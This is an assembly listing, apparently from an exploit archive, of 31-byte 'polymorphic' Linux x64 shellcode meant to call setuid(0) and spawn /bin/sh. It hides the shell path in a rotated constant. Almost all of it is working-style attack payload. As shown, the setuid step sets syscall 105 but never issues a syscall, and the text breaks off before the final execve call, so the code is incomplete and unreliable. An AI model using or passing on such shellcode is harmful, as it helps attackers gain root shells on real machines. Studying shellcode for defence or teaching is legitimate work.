Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)









; For a detailed explanation of this shellcode see my blog post: 

global _start 

section .text

; setuid(0)
	xor edi,edi
	push rdi ; null terminator for the following string	
	push 105
	pop rax
	; push /bin//sh in reverse 
	mov rbx,0xd0e65e5edcd2c45e

; execve
	ror rbx,1
	mov al,59
	push rbx
	xchg esi,edi
	push rsp
	; store /bin//sh address in RDI, points at string
	pop rdi
	; Call the Execve syscall 